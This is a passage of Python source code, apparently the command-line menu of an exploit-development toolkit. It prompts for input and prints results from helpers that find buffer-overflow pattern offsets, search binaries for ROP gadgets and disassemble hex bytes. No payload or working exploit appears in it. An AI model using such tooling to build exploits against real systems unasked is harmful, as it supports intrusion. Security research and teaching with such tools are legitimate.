    length = input(f"{Colors.WHITE}Pattern length (default 20000): {Colors.RESET}").strip() or '20000'

    try:
        pattern_length = int(length)
    except ValueError:
        print(f"\n{Colors.RED}Error: Pattern length must be a whole number, got {length!r}{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return

    result = dev.find_pattern_offset(value, pattern_length)
    if result.get('offset', -1) >= 0:
        print(f"\n{Colors.GREEN}[+] Found at offset: {result['offset']}{Colors.RESET}")
        print(f" Matched: {result['matched']} ({result['endian']})")
    else:
        print(f"\n{Colors.RED}{result.get('error', 'Not found')}{Colors.RESET}")
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_rop_gadgets(dev):
    """CLI: ROP gadget finder.

    Prompts for a binary path and an optional gadget type (blank or
    ``all`` means no filter), runs ``dev.find_rop_gadgets`` and prints at
    most the first 50 gadgets plus a count of the remainder.
    """
    shown_limit = 50

    binary = input(f"\n{Colors.WHITE}Binary path: {Colors.RESET}").strip()
    if not binary:
        return
    wanted = input(f"{Colors.WHITE}Gadget type (all/pop_ret/xchg/mov/syscall/jmp_esp/call_reg): {Colors.RESET}").strip()
    gtype = None if wanted in ('', 'all') else wanted

    result = dev.find_rop_gadgets(binary, gtype)
    if 'error' not in result:
        total = result['count']
        print(f"\n{Colors.GREEN}[+] Found {total} gadgets (via {result['tool']}){Colors.RESET}\n")
        for entry in result['gadgets'][:shown_limit]:
            print(f" {Colors.CYAN}{entry['address']}{Colors.RESET}: {entry['gadget']} [{entry['type']}]")
        if total > shown_limit:
            print(f"\n ... and {total - shown_limit} more")
    else:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_disassemble(dev):
    """CLI: Disassemble hex bytes.

    Prompts for hex bytes and an architecture (blank means x64), then
    prints the listing from ``dev.disassemble`` or its error. Returns
    immediately when no bytes are entered.
    """
    hex_data = input(f"\n{Colors.WHITE}Hex bytes: {Colors.RESET}").strip()
    if not hex_data:
        return
    chosen_arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip()
    arch = chosen_arch or 'x64'

    result = dev.disassemble(hex_data, arch)
    if 'error' not in result:
        print(f"\n{Colors.GREEN}[+] {result['count']} instructions (via {result['tool']}){Colors.RESET}\n")
        print(result['listing'])
    else:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
# ---------------------------------------------------------------------------
# Singleton
# ---------------------------------------------------------------------------
# Lazily created module-wide ExploitDev; populated by get_exploit_dev().
_instance = None


def get_exploit_dev() -> ExploitDev:
    """Get singleton ExploitDev instance.

    The instance is constructed on the first call and the same object is
    returned on every later call.
    """
    global _instance
    if _instance is not None:
        return _instance
    _instance = ExploitDev()
    return _instance